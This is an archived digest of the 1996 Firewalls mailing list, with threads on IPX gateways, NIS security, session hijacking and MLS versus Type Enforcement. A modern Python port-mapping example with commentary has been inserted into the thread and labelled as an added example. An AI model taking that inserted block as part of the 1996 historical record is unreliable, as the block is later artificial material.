From firewalls-owner Thu Feb 1 00:38:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA27720 for firewalls-outgoing; Thu, 1 Feb 1996 00:34:35 -0800 (PST)
Received: from gatekeeper.n-i.nhs.uk (gatekeeper.n-i.nhs.uk [194.72.228.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA27715 for ; Thu, 1 Feb 1996 00:34:28 -0800 (PST)
Received: from dismail.dis.n-i.nhs.uk by gatekeeper.n-i.nhs.uk; (5.65/1.1.8.2/23May95-1119AM) id AA06273; Thu, 1 Feb 1996 08:33:28 GMT
Received: from cc:Mail by dis.n-i.nhs.uk id AA823192503; Thu, 01 Feb 96 08:33:08 GMT
Date: Thu, 01 Feb 96 08:33:08 GMT
From: "MCARDLE MARK"
Message-Id: <9601018231.AA823192503@dis.n-i.nhs.uk>
To: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anyone know of a version of screend that runs on either DGUX, AIX, HPUX or LINUX? We are currently using a Digital Firewall and are looking at the DGUX DSO containment firewall.

Thanks in advance

Mark McArdle
mmcardle@dis.n-i.nhs.uk
http://www.dis.n-i.nhs.uk

From firewalls-owner Thu Feb 1 01:53:37 1996
From: Mondher Maddouri
Organization: E.N.S.I, Ecole Nationale des Sciences de l'Informatiques
Date: Thu, 01 Feb 1996 10:47:22 +0100
To: tunisia@univ-lyon1.fr, firewalls@GreatCircle.COM
Subject: Card driver, thanks
Message-Id: <31108C2A.210F@ensi.rnrt.tn>

Hi everyone,

Thank you very much for your help about the card drivers under Unix. In particular, I thank Guettari for his helpful answer.

Sincerely,
mondher

From firewalls-owner Thu Feb 1 02:09:08 1996
From: Mondher Maddouri
Organization: E.N.S.I, Ecole Nationale des Sciences de l'Informatiques
Date: Thu, 01 Feb 1996 10:51:33 +0100
To: firewalls@GreatCircle.COM, tunisia@univ-lyon1.fr
Subject: Securing an anonymous ftp access
Message-Id: <31108D25.723D@ensi.rnrt.tn>

Hi everyone,

Can any of you send me information about how I can install an ftp server, and how I can control access to this ftp server, so that I can authorize only some addresses or some users to access it?

Thanks much,
maddouri@ensi.rnrt.tn

From firewalls-owner Thu Feb 1 02:39:33 1996
From: jsanchez@esegi.es (Julio Sanchez)
Organization: SGI Soluciones Globales Internet
Newsgroups: gmv.gw-lists.firewalls
Subject: Re: Sequence Number Attacks
Date: 1 Feb 1996 10:32:33 GMT
To: gmv-gw-lists-firewalls@gmv.es
Message-Id: <4eq4s1$ruv@melmac.gmv.es>
References: <199601201904.OAA26032@goffer.cb.att.com>

C Matthew Curtin (cmcurtin@goffer.cb.att.com) wrote:
:
: Now, say I'm a Bad Guy on the network somewhere between you and your
: destination. Using the TCP sequence number attack, I fool your
: destination into thinking that I'm you, and I take over your
: session. The end result is that you are dropped, and I have simply
: taken over from where you left off.

The TCP sequence number attack mentioned was about TCP sequence number *guessing*. If you are in between, you know the sequence numbers. What you describe is possible, but it is not the kind of attack being described. It is usually called session hijacking or TCP splicing.

All the best,
-- 
Julio Sanchez, SGI Soluciones Globales Internet
Tel/Fax: 91/804 14 05   WWW: http://www.esegi.es
jsanchez@esegi.es   jsanchez@gmv.es
PGP Key fingerprint = E5 29 93 6F 41 4E 00 E2 90 11 A1 8C 72 D0 DE 71

From firewalls-owner Thu Feb 1 02:39:36 1996
From: bressen@hks.net (Andrew K. Bressen)
Organization: HKS.net
Date: 1 Feb 1996 04:40:25 -0500
To: firewalls@bb.hks.net
Subject: Re: Internet-access from Novell
Message-ID: <4eq1q9$q58@bb.hks.net>
References: <199601170108.RAA03101@phoenix>

I'm confronting the same issue with a client right now, only with an added problem...
more on that; first, here is a summary of what I've seen mentioned here and elsewhere, plus pointers to the PC Magazine reviews of same:

PC Magazine overview article
  http://www.zdnet.com/~pcmag/1413/pcm00155.htm

Internet Junction (now Cisco) Passport
  http://www.ij.com/
  http://www.zdnet.com/~pcmag/1413/pcm00156.htm (review)
  runs on an NT box

Novix Firefox
  http://www.novix.com/
  http://www.zdnet.com/~pcmag/1413/pcm00159.htm
  NLM

Performance Technology Instant Internet
  http://www.perftech.com/
  http://www.zdnet.com/~pcmag/1413/pcm00157.htm
  comes with hardware

Internetware IWare Connect
  http://www.internetware.com/
  http://www.zdnet.com/~pcmag/1413/pcm00158.htm
  NLM

Frontier Tech CyberJunction
  http://www.frontiertech.com/products/cyjunctn.htm
  runs on an NT box
  (I had no problem finding info on this site...)

Anybody got any others? Please cc me on replies.

From firewalls-owner Thu Feb 1 02:53:24 1996
From: bressen@hks.net (Andrew K. Bressen)
Organization: HKS.net
Date: 1 Feb 1996 05:31:32 -0500
To: firewalls@bb.hks.net
Subject: Re: Internet-access from Novell
Message-ID: <4eq4q4$qde@bb.hks.net>
References: <199601170108.RAA03101@phoenix>

Here's the worse problem I mentioned.

I've grepped over 9000 archived articles of this group and found no mention of how to firewall Novell boxes from each other.

I have a client in the financial industry who has a market data feed from a provider. The market data feed is provided by a Novell server on a leased line, with special client software for the users. How do I protect said client from, say, a disgruntled mailroom employee at the provider end, bent on hacking on the client's network?

I'm not even sure what Novell uses in lieu of tcp/udp ports; pointers to IPX/SPX docs, and the Novell equivalent of an /etc/services file would be most appreciated.

Are there any IPX/SPX packet filters available?

Are there any IPX proxy server firewalls available? CJC from Novell mentioned their existence, but gave little other info.

Of course I'll start by recommending that the market data feed box go onto its own ethernet segment, and that IP traffic is not forwarded on or off of that segment.

From firewalls-owner Thu Feb 1 03:09:39 1996
From: bressen@hks.net (Andrew K. Bressen)
Organization: HKS.net
Date: 1 Feb 1996 05:15:08 -0500
To: firewalls@bb.hks.net
Subject: Re: Internet-access from Novell
Message-ID: <4eq3rc$qal@bb.hks.net>
References: <199601170108.RAA03101@phoenix>

My questions about the IPX-IP gateway products I just posted about (Novix, Internet Junction Passport, Cyberjunction, Instant Internet, and Iware Connect) are as follows:

* Given that they have their own winsocks, do they work with Windows 95?

* How about with Windows NT? Given

      ISP----router----| IP2IPX |-------Novell Clients

  I believe that NT can be a Novell client as well as a LanManager client; if one is running NT with IP turned off, can an alternate winsock be used?

* I assume that the way these suckers work is to register each outbound TCP or UDP connection in some way and, acting as a proxy, assign a port number that will map to the specific PC. For example, I'm on Novell node foo, and I telnet out, and the IP2IPX gateway assigns me port 9073 and knows that packets for that port get rehashed and sent to my PC's Winsock.

  How do they deal with UDP? If, for example, I wanted to NFS mount some Internet archives on my Novell PC inside the proxy gateway, how is it going to deal? How long are the port numbers reserved for? Unless they are registered permanently, which might well run one out of ports entirely for a large network, how can the stateless connections be dealt with?
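The port-registration scheme Bressen guesses at (one external port per outbound flow, mapped back to the originating PC) is exactly the state a port-translating proxy gateway has to keep, and his two follow-up questions are the table-management problems that come with it: how UDP is handled when there is no connection close to watch for, and how long a port stays reserved before a large network runs the pool dry. The following is an added example written for this page, not code from any of the products named in the thread or from anyone on the list. It is a small Python mapping table that hands out external ports, releases TCP entries after the connection is seen to close, expires UDP entries on idle time, refuses new flows when the pool is empty rather than reusing a port that still belongs to a live flow, and delivers inbound packets only when their source matches the peer the internal node actually contacted. The node names, the four-port pool (1024-1027, so exhaustion shows up quickly) and the timeout values are constructed for illustration.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# A flow is identified by the internal node and socket that opened it, the
# transport protocol, and the Internet peer it talked to.
FlowKey = Tuple[str, int, str, str, int]


@dataclass
class Mapping:
    key: FlowKey
    ext_port: int
    last_seen: float
    tcp_closed: bool = False


class PortMapper:
    """State table for a port-translating proxy gateway (constructed example).

    Each outbound flow gets one external port.  TCP entries are released a
    short grace period after the connection is seen to close; UDP has no
    close, so its entries expire when idle.  Timeouts are illustrative only.
    """

    def __init__(self, first_port: int = 1024, last_port: int = 1027,
                 udp_idle: float = 30.0, tcp_grace: float = 5.0) -> None:
        self.free = list(range(first_port, last_port + 1))
        self.by_key: Dict[FlowKey, Mapping] = {}
        self.by_port: Dict[int, Mapping] = {}
        self.udp_idle = udp_idle
        self.tcp_grace = tcp_grace

    def outbound(self, key: FlowKey, now: float) -> Optional[int]:
        """Packet from an internal node: return the external port to send it from.

        Returns None when the pool is exhausted; the gateway should then drop
        the packet rather than reuse a port that still belongs to a live flow.
        """
        self.expire(now)
        m = self.by_key.get(key)
        if m is None:
            if not self.free:
                return None
            port = self.free.pop(0)
            m = Mapping(key, port, now)
            self.by_key[key] = m
            self.by_port[port] = m
        m.last_seen = now
        return m.ext_port

    def inbound(self, ext_port: int, proto: str, src_host: str, src_port: int,
                now: float) -> Optional[Tuple[str, int]]:
        """Packet from the Internet: return (node, socket) to deliver to, or None.

        Only the peer the internal node contacted may answer on the reserved
        port; anything else aimed at that port is dropped as unsolicited.
        """
        self.expire(now)
        m = self.by_port.get(ext_port)
        if m is None:
            return None
        node, sock, mproto, host, port = m.key
        if (mproto, host, port) != (proto, src_host, src_port):
            return None
        m.last_seen = now
        return node, sock

    def tcp_close(self, key: FlowKey, now: float) -> None:
        """Record that a TCP flow finished (FIN/RST seen); reclaimed after the grace period."""
        m = self.by_key.get(key)
        if m is not None:
            m.tcp_closed = True
            m.last_seen = now

    def expire(self, now: float) -> None:
        """Return the ports of idle UDP flows and closed TCP flows to the pool."""
        for m in list(self.by_key.values()):
            proto = m.key[2]
            idle = now - m.last_seen
            dead = ((proto == "udp" and idle >= self.udp_idle) or
                    (proto == "tcp" and m.tcp_closed and idle >= self.tcp_grace))
            if dead:
                del self.by_key[m.key]
                del self.by_port[m.ext_port]
                self.free.append(m.ext_port)


def demo() -> dict:
    """Walk through allocation, an unsolicited reply, exhaustion and reclamation."""
    pm = PortMapper()
    t = 0.0
    # Node "foo" telnets out (TCP) and does a DNS lookup (UDP); peers are constructed.
    telnet = ("foo", 0x4001, "tcp", "198.51.100.10", 23)
    dns = ("foo", 0x4002, "udp", "198.51.100.53", 53)
    p_telnet = pm.outbound(telnet, t)
    p_dns = pm.outbound(dns, t)
    # The real DNS server's reply is delivered; a packet to the same port from elsewhere is not.
    reply_ok = pm.inbound(p_dns, "udp", "198.51.100.53", 53, t + 1)
    reply_other = pm.inbound(p_dns, "udp", "203.0.113.9", 53, t + 1)
    # Two more nodes take the remaining ports; a fifth flow finds the pool empty.
    pm.outbound(("bar", 0x4001, "tcp", "198.51.100.10", 23), t)
    pm.outbound(("baz", 0x4001, "tcp", "198.51.100.10", 23), t)
    exhausted = pm.outbound(("qux", 0x4001, "tcp", "198.51.100.10", 23), t + 2)
    # Once the UDP flow has been idle past its timeout, its port is reclaimed.
    after_udp_idle = pm.outbound(("qux", 0x4001, "tcp", "198.51.100.10", 23), t + 40)
    # The telnet session closes; after the grace period its port is reclaimed too.
    pm.tcp_close(telnet, t + 41)
    after_tcp_close = pm.outbound(("quux", 0x4001, "udp", "198.51.100.53", 53), t + 47)
    return {"p_telnet": p_telnet, "p_dns": p_dns, "reply_ok": reply_ok,
            "reply_other": reply_other, "exhausted": exhausted,
            "after_udp_idle": after_udp_idle, "after_tcp_close": after_tcp_close}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The peer check in `inbound` is what separates a proxy table from a plain hole in the packet filter: a reserved port is only open to the one host and port the inside node talked to, so an Internet host that notices the port is in use cannot push packets through it to the PC. The trade-off Bressen raises is visible in `expire`: a short UDP idle timeout keeps the pool from filling up on a large network, but a long-lived stateless service such as NFS over UDP has to keep sending within the timeout or it loses its mapping and the next reply is dropped.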
From firewalls-owner Thu Feb 1 03:23:32 1996
From: Julio Sanchez
Date: Thu, 1 Feb 96 11:01:25 +0100
To: Doug.Hughes@Eng.Auburn.EDU
Cc: jsanchez@esegi.es, firewalls@greatcircle.com
Subject: Re: how secure is NIS
Message-Id: <9602011001.AA28631@gmv.es>
In-Reply-To: (message from Doug Hughes on Wed, 31 Jan 1996 08:29:39 -0600)

> From: Doug Hughes
> Date: Wed, 31 Jan 1996 08:29:39 -0600
> Cc: firewalls@greatcircle.com
>
> I think you are confusing our firewall with our external router. As this
> wasn't made clear in the original post, that is a natural mistake. My point
> was that the University as a whole has an external router that has a block
> as opposed to allow strategy by necessity. There are several protocols that
> we can all agree deserve blocking (RPC, NFS, rexec, etc). However, making
> an allow list would be huge and unwieldy (while blocking all else).
> Our firewall is actually part of the engineering network and does serve
> to protect us from other depts outside of engineering in a limited fashion.
> I wouldn't call it a real firewall as it uses tcp_wrappers, some scanner
> detection, and other IDS type tools, but it serves its purpose admirably.

Good, so you already have one or more internal firewalls. That was actually the point I was making, that a firewall protecting a University network from the Internet is silly most of the time.

But the point being made in the thread by others is that RPC, etc. are not really securable.

And then my other implicit point was that the University network at large is not protected very strongly. This is actually very common in Universities and is not necessarily wrong in itself. Only that everyone must be aware of this and no unwarranted expectations should be raised by anyone. You cannot be very open (like your departments require) and very protected at the same time.

> The ruleset on the external router is quite small, unfortunately, and
> necessitates a block vs. allow strategy.

That, as you probably know, requires you to know what is dangerous and we don't really know that. At most, we think we know what things don't seem to be dangerous. And some people in the list will immediately point out that I am being too optimistic :-)

> The actual firewall machines are under our direct control and are
> self-consistent and wholly configured by us.
> We do not rely upon the external router to be a panacea, but just to do the
> little things that an External router can be good at:
> 1) preventing external TCP/IP spoofing attacks

Good, but in an open environment such as yours it is probably very easy to get to some internal machine, maybe even through approved means (accounts for research partners, student accounts whose passwords circulate around, etc.), and as soon as they've got a stronghold inside, the router (or a more restrictive firewall for that matter) is going to be of little help.

> 2) preventing source routing

Good again, but see above.

> 3) blocking agreed upon services

I have already commented on this, but see that some services cannot easily be mapped to filterese (source/dest, address/port, etc.). You might be blocking the services that you consider dangerous *and* can be filtered. Notice the emphasis on "and".

So, your network at large is not really very secure and cannot probably be secured without major rethinking/restructuring and a lot of consensus.

At least you already have some networks more protected, so it seems you are more aware of the issues than I had thought at first (so I apologize for jumping so fast). The Spanish University I mentioned did not seem to be, so the depth of the damage is unknown. No one knows how deep they got, but the fact that disguised sniffers were found is not comforting. Since all I know about this intrusion is second hand and off-the-record, it might be pure invention. So those considering asking (some already have), please refrain, I cannot tell who they are unless they come forward. But it is worth some thinking even if it just were a hypothetical case (similar cases have been reported before anyway).

All the best,
-- 
Julio Sanchez, SGI Soluciones Globales Internet
Tel/Fax: 91/804 14 05   WWW: http://www.esegi.es
jsanchez@esegi.es   jsanchez@gmv.es
PGP Key fingerprint = E5 29 93 6F 41 4E 00 E2 90 11 A1 8C 72 D0 DE 71

From firewalls-owner Thu Feb 1 03:53:33 1996
From: "Finn T Andersen"
Date: Thu, 1 Feb 1996 12:39:49 +0100
To: firewalls@greatcircle.com
Subject: NIS+
Message-Id: <9602011239.ZM14289@eagle.novo.dk>

There has been a lot of good
information and suggestions about NIS recently; however, no one has mentioned anything about NIS+. I have heard that NIS+ should be a very secure system, but in fact I have never heard about anyone who was using it. Is it available, and on what platforms?

---
Finn Andersen
-- 
Finn T Andersen   +45 44 42 60 49
e-mail X.400 /c=dk/admd=dk400/prmd=novonordisk/s=fina
Addr. Novo Nordisk A/S, Novo alle, 2880 Bagsvaerd DK

From firewalls-owner Thu Feb 1 04:38:42 1996
From: Paul Ferguson
Date: Thu, 01 Feb 1996 07:21:46 -0500
To: bressen@hks.net (Andrew K. Bressen)
Cc: firewalls@bb.hks.net
Subject: Re: Internet-access from Novell
Message-Id: <199602011221.EAA12352@lint.cisco.com>

At 05:31 AM 2/1/96 -0500, Andrew K. Bressen wrote:
>
>I'm not even sure what novell uses in lieu of tcp/udp ports;
>pointers to IPX/SPX docs, and the Novell equivalent of
>an /etc/services file would be most appreciated.
>
>Are there any IPX/SPX packet filters available?
>

Yes -- they're called routers. :-)

- paul

-- 
Paul Ferguson
Consulting Engineering
Reston, Virginia USA
tel: +1.703.716.9538
e-mail: pferguso@cisco.com
cisco Systems

From firewalls-owner Thu Feb 1 04:53:34 1996
From: Ed Woodrick
Date: Thu, 1 Feb 1996 07:27:52 -0500
To: "firewalls@bb.hks.net"
Subject: RE: Internet-access from Novell
Message-ID:

I know that this is probably a radical answer, but what about using Novell access permissions to restrict access to the data? I don't know why you would want to go to the trouble of putting up firewalls when just a simple permission change should work. It's a lot easier and I expect a lot safer to perform security at the operating system level than at the network level.

Ed Woodrick

----------
From: bressen@hks.net [SMTP:bressen@hks.net]
Sent: Thursday, February 01, 1996 5:31 AM
To: firewalls@bb.hks.net
Subject: Re: Internet-access from Novell

Here's the worse problem I mentioned.

I've grepped over 9000 archived articles of this group and found no mention of how to firewall novell boxes from each other.

I have a client in the financial industry who has a market data feed from a provider. The market data feed is provided by a novell server on a leased line, with special client software for the users. How do I protect said client from, say, a disgruntled mailroom employee at the provider end, bent on hacking on the clients network?

I'm not even sure what novell uses in lieu of tcp/udp ports; pointers to IPX/SPX docs, and the Novell equivalent of an /etc/services file would be most appreciated.

Are there any IPX/SPX packet filters available?

Are there any IPX proxy server firewalls available? CJC from Novell mentioned their existence, but gave little other info.

Of course I'll start by recommending that the market data feed box go onto its own ethernet segment, and that IP traffic is not forwarded on or off of that segment.

From firewalls-owner Thu Feb 1 05:24:03 1996
From: Jane Ferreira Cunha
Date: Thu, 1 Feb 1996 11:08:35 -0600 (CST)
Subject: What are MLS and TE?
To: firewalls@greatcircle.com
Message-Id:

Please, where can I find some explanation about MLS and TE? I've seen a lot of discussion about them, but so far I couldn't understand it. Are they in a FAQ somewhere?

TIA,
Jane

Jane Ferreira Cunha
Network Manager
TELESC
Florianopolis - SC - Brasil
Tel. +55 48 231-2600
Fax +55 48 231-2611
e-mail: jane@telesc.gov.br

From firewalls-owner Thu Feb 1 05:38:31 1996
From: Paul Ferguson
Date: Thu, 01 Feb 1996 08:07:08 -0500
To: bressen@hks.net (Andrew K. Bressen)
Cc: firewalls@greatcircle.com
Subject: Re: Internet-access from Novell
Message-Id: <199602011306.FAA18975@lint.cisco.com>

At 05:15 AM 2/1/96 -0500, Andrew K. Bressen wrote:
>My questions about the IPX-IP gateway products I just posted about
>(Novix, Internet Junction Passport, Cyberjunction, Instant Internet,
>and Iware Connect) are as follows:
>
> * given that they have their own winsocks,
>   do they work with windows95?
>
> * how about with windows NT? given
>

Internet Junction has support for both Win95 [client] and NT [server].
http://www.cisco.com/

- paul

-- 
Paul Ferguson
Consulting Engineering
Reston, Virginia USA
tel: +1.703.716.9538
e-mail: pferguso@cisco.com
cisco Systems

From firewalls-owner Thu Feb 1 05:56:30 1996
From: Chris Woods
Date: Thu, 1 Feb 1996 08:38:36 -0500 (EST)
To: "Andrew K. Bressen"
cc: firewalls@bb.hks.net
Subject: Re: Internet-access from Novell
In-Reply-To: <4eq4q4$qde@bb.hks.net>
Message-ID:

On 1 Feb 1996, Andrew K. Bressen wrote:
[...]
> I've grepped over 9000 archived articles of this group
> and found no mention of how to firewall novell boxes from
[...]
> Are there any IPX/SPX packet filters available?

I'm about to embark on the same journey. Knowing little or nothing about Novell, I know it is going to be a long journey. However, I can say that I know that there are IPX packet filters available. Livingston's Portmaster IRX router has the ability to route IPX, as well as the ability to create IPX filter rules. See http://www.livingston.com.

Sorry I couldn't be of more assistance...

Chris Woods
Systems Administrator
cjwoods@paladin.com
Paladin Computing Solutions
617-273-4226
http://www.paladin.com
"Never underestimate the destructive power of a backhoe." -Brent Chapman

From firewalls-owner Thu Feb 1 06:23:21 1996
From: Doug Hughes
Date: Thu, 1 Feb 1996 08:19:38 -0600
Subject: Re: how secure is NIS
To: jsanchez@gmv.es
Cc: firewalls@greatcircle.com
Message-Id:
In-Reply-To: <9602011001.AA28631@gmv.es>

From: Julio Sanchez
>
>> From: Doug Hughes
>> Date: Wed, 31 Jan 1996 08:29:39 -0600
>> Cc: firewalls@greatcircle.com
>>
>> I think you are confusing our firewall with our external router. As this
>> wasn't made clear in the original post, that is a natural mistake. My point
>> was that the University as a whole has an external router that has a block
>> as opposed to allow strategy by necessity. There are several protocols that
>> we can all agree deserve blocking (RPC, NFS, rexec, etc). However, making
>> an allow list would be huge and unwieldy (while blocking all else).
>> Our firewall is actually part of the engineering network and does serve
>> to protect us from other depts outside of engineering in a limited fashion.
>> I wouldn't call it a real firewall as it uses tcp_wrappers, some scanner
>> detection, and other IDS type tools, but it serves its purpose admirably.
>
>Good, so you already have one or more internal firewalls. That was
>actually the point I was making, that a firewall protecting a
>University network from the Internet is silly most of the time.
>
>But the point being made in the thread by others is that RPC, etc. are
>not really securable.
>

Hmm, I didn't hear that point, and I disagree. RPC and NIS are securable if you know what you are doing and you take the appropriate steps. I've outlined this before, and it's available on my WWW page, so I won't belabor the point here again. (Note: securable from outside attack, but less so from inside attack - an important distinction.)

>And then my other implicit point was that the University network at
>large is not protected very strongly. This is actually very common in
>Universities and is not necessarily wrong in itself. Only that
>everyone must be aware of this and no unwarranted expectations should
>be raised by anyone. You cannot be very open (like your departments
>require) and very protected at the same time.
>

Agreed.

>> The ruleset on the external router is quite small, unfortunately, and
>> necessitates a block vs. allow strategy.
>
>That, as you probably know, requires you to know what is dangerous and
>we don't really know that. At most, we think we know what things don't
>seem to be dangerous. And some people in the list will immediately
>point out that I am being too optimistic :-)
>

The list of services that are known to be not used are blocked (tcpmux, link, supdup, stuff like that). The list of known-to-be-dangerous services are blocked (NFS, RPC). Anything can be used dangerously. Somebody could set up a server on any port. Since arbitrary servers cannot be denied by fiat, this is one of those things we must live with and accept.

>> The actual firewall machines are under our direct control and are
>> self-consistent and wholly configured by us.
>> We do not rely upon the external router to be a panacea, but just to do the
>> little things that an External router can be good at:
>> 1) preventing external TCP/IP spoofing attacks
>
>Good, but in an open environment as yours it is probably very easy to
>get to some internal machine maybe even through approved means
>(accounts for research partners, student accounts whose passwords
>circulate around, etc.) and as soon as they've got a stronghold
>inside, the router (or a more restrictive firewall for that matter) is
>going to be of little help.
>

We have been trying to implement a one-time password or token based authentication mechanism for outsiders, but either the expense or the hassle has made it impractical up till now. It's a matter that is constantly being revisited. If I had my druthers we would have secure telnet clients for access and one time passwords (not necessarily in combination, but possibly). Finding a multi-platform free secure telnet is an ongoing project. :) (STILL waiting on STel.)

tripwire, tcp_wrappers, rpcbind, modified logins, extensive logging, and a GUI IDS help us detect who's been 'bad or good'. We also watch patterns of students/profs logging in from external sites. I have a pseudo-AI perl tool that scans the wrappers logs and detects unusual patterns of user activity. It logs any connections outside the US, connections from multiple domains, and connections where RFC931 style identification does not match local ID, as well as users logging into a machine that they don't normally use. We've caught quite a few people doing password sharing this way. They don't do it again if they want to continue using their accounts. ;)

>
>So, your network at large is not really very secure and cannot
>probably be secured without major rethinking/restructuring and a lot
>of consensus.
>

It depends on what you refer to as the network at large. The University (except possibly COE and some other small pockets) network is largely unsecured except for router filters. Yes, this is an undesirable truth. The COE network has much more security. It has a fair balance of usability vs. security. I am constantly trying to make it more secure without making it less usable. That secure telnet client would go a long way to helping here.

>At least you already have some networks more protected so it seems you
>are more aware of the issues that I had thought at first (so I
>apologize for jumping so fast). The Spanish University I mentioned did
>not seem to be, so the depth of the damage is unknown. No one knows
>how deep they got, but the fact that disguised sniffers were found is
>not comforting. Since all I know about this intrusion is second hand
>and off-the-record, it might be pure invention. So those considering
>asking (some already have), please refrain, I cannot tell who they are
>unless they come forward. But it is worth some thinking even if it
>just were an hypothetical case (similar cases have been reported
>before anyway).
>

Luckily, with our current setup, it is easy to net-boot and install workstations should a population of them become corrupted. The installation software is protected. (It also helps to have fast 8mm tape drives in emergencies - luckily we haven't had one in 2-3 years.)

-- 
____________________________________________________________________________
Doug Hughes                                  Engineering Network Services
System/Net Admin                             Auburn University
doug@eng.auburn.edu
Pro is to Con as progress is to congress

From firewalls-owner Thu Feb 1 07:08:58 1996
From: mdr@vodka.sse.att.com
Subject: Thanks for the helpful Intrusion Detection refs
To: firewalls@greatcircle.com
Date: Thu, 1 Feb 1996 10:02:52 -0500 (EST)
Message-Id: <9602011453.AA26630@ig4.att.att.com>

Thank you to all who wrote with research leads in intrusion detection. They have proven most helpful and will probably keep me busy for a while as I try to trace them all down.
I will send a copy of the responses I received to anyone who requests one by private email.

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Thu Feb 1 07:24:20 1996
From: mdr@vodka.sse.att.com
Subject: Re: Mandatory protection (was: product selection)
To: t-jont@microsoft.com (Jonathon Tidswell)
Date: Thu, 1 Feb 1996 09:58:00 -0500 (EST)

JonT asks:

> For those of us who don't have (or have not had) ready access to half a
> dozen "secure" systems.
> Can someone please comment on / answer the following ?
>
> - TE is a MAC mechanism for providing least privilege

Rick Smith could probably speak better on this one. TE appears to be quite flexible and capable.

> - MLS is a hierarchical labeling scheme for MAC (originally aimed at
> confidentiality)

MLS uses security labels that are composed of two elements:

    a hierarchical level
    a set of categories

The levels and categories are often assigned names such as "proprietary" and "payroll" respectively. The "proprietary" level means that this information should be handled according to the rules of the organization for proprietary information. Some information could be considered "public" and thus have more relaxed rules for handling. So "public" and "proprietary" are MLS levels showing increasing need for protection.

You could have many kinds of information: payroll, capital, medical records, bids and proposals etc. Some of this information is publicly available (like earnings reports), some is highly proprietary (like medical records).

A security label identifies information's level and content. So [proprietary, medical records] means the obvious. Users are cleared according to their level of trust, and need-to-know. And data files are carefully labeled. The OS controls the flow of information from one security label to another by a simple policy: Read down, write equal. This prevents [proprietary, payroll] data from getting mixed up with [proprietary, medical records] or being released to the [public].

Some programs might need access to *both* payroll and medical records. Such a program would run with the security label of [proprietary, payroll, medical records]. It could freely *read* both payroll and medical records, but it could not *write* to them. In fact every file that it created would bear the new label [proprietary, payroll, medical records].

As you can see the MLS model is primarily concerned with protecting access to information. However the model has other uses.

Fortunately, there are a number of MLS systems out there. The implementations tend to take the MLS model *very* seriously. I believe that these systems are good choices for firewall implementation because the MLS model can be used to protect the operating system code from user processes, and to separate programs into mutually exclusive domains. Plus, why not use existing technology if it meets the need.

> - B2 systems require 'least privilege' mechanism (in addition to the MLS
> required at B1)

Yep

> - Firewalls seem to be more intuitively served with least privilege than
> with MLS

There are a lot of firewall features that are "intuitively" served via least privilege. If the mechanism has sufficient granularity, it can control the ability to create executables, open devices, fork processes etc. It can also carve "root" into separate administrative roles so that the guy who does your backups doesn't wind up with unlimited access to your system.

There are also a lot of firewall features that are easily served via MLS. It can protect the OS code, prevent the creation of trojan horses, control access to devices and files etc. Although "intuitively" one might think that MLS only has to do with data labeling.

>
> Is there a common model or mechanism (other than TE) for least privilege in
> B2 (and above) systems ?

Good question, wish I could answer it. My work has been with B1 systems that have some B2 and higher features such as some least privilege capabilities but w/o a general mechanism. USL/Novell/... has been working on a B2 Unix that has a least privilege mechanism, but I am not aware of any "common model" used industry wide.

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Thu Feb 1 08:08:23 1996
Date: Thu, 1 Feb 1996 07:35:50 -0800
From: dan@filoli.com (Dan Curry)
To: firewalls@GreatCircle.COM, cbk@starbase.ingress.com
Subject: Re: Lotus Notes replication

# LOTUS NOTES
#
lotusnotes      1352/tcp        # Lotus Notes

> From firewalls-owner@GreatCircle.COM Wed Jan 31 22:56:34 1996
> Date: Thu, 1 Feb 1996 01:00:20 -0500
> To: firewalls@GreatCircle.COM
> From: cbk@starbase.ingress.com (Charles B. Kaplan)
> Subject: Lotus Notes replication
>
> Does anyone know what ports Lotus Notes uses when it wants to replicate ?
>
> I want to plug these through my firewall.
>
> Thanks in advance.
>
> -CK
>

From firewalls-owner Thu Feb 1 08:10:02 1996
Date: Thu, 1 Feb 1996 10:29:24 -0500 (EST)
From: Chris Woods
To: Ed Woodrick
cc: "firewalls@bb.hks.net"
Subject: RE: Internet-access from Novell

On Thu, 1 Feb 1996, Ed Woodrick wrote:

> I know that this is probably a radical answer, but what about using
> Novell access permissions to restrict access to the data? I don't know
> why you would want to go to the trouble of putting up firewalls when
> just a simple permission change should work. It's a lot easier and I
> expect a lot safer to perform security at the operating system level
> than at the network level.

That goes back to the host-level security vs. network-level security. There are many good reasons why host-level security is not usually feasible, the biggest being that it is not very scalable. For every new machine you install and attach to the LAN, you have to implement security measures. One also assumes that each individual on each host does not have the ability or knowledge to change the host-level security features.

With network-level security, there is (theoretically) one point of potential access, which can be (theoretically) maintained by one entity (whether it's one person or one group of people) who can (again, theoretically) ensure that security policies are adhered to.

Chris Woods                         Systems Administrator
cjwoods@paladin.com                 Paladin Computing Solutions
617-273-4226                        http://www.paladin.com
"Never underestimate the destructive power of a backhoe." -Brent Chapman

From firewalls-owner Thu Feb 1 08:24:02 1996
Date: Thu, 1 Feb 1996 11:11:04 -0500 (EST)
From: Scott Barman
To: Finn T Andersen
Cc: firewalls@greatcircle.com
Subject: Re: NIS+
In-Reply-To: <9602011239.ZM14289@eagle.novo.dk>

On Thu, 1 Feb 1996, Finn T Andersen wrote:

> There has been a lot of good information and suggestions about NIS recently,
> however, no one has mentioned anything about NIS+.
> I have heard that NIS+ should be a very secure system, but in fact I have never
> heard about anyone who was using it. Is it available, and on what platforms ?

It's available for Solaris 2.3 and later and only from Sun (or any of their OEMs/VARs). NIS+ has a real problem interoperating with NIS, which most people have (if they're using NIS).

scott barman

-- 
scott barman            DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com                and I speak only for myself.
barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman

From firewalls-owner Thu Feb 1 08:42:35 1996
Subject: Re: Mandatory protection (was: product selection)
To: Firewalls@GreatCircle.COM
Date: Thu, 1 Feb 1996 11:26:31 -0500 (EST)
From: Charles Watt

> From: Rick Smith
>
> I think we've covered most of the issues so far in the Type
> Enforcement (TE) versus Multilevel Security (MLS)
> discussion pretty well, but there are two remaining issues
> that need clearing up.
>
> I don't think the unresolved topics arise from ignorance or
> a simple failure to communicate; we have a genuine and
> fully unintended culture clash.
>
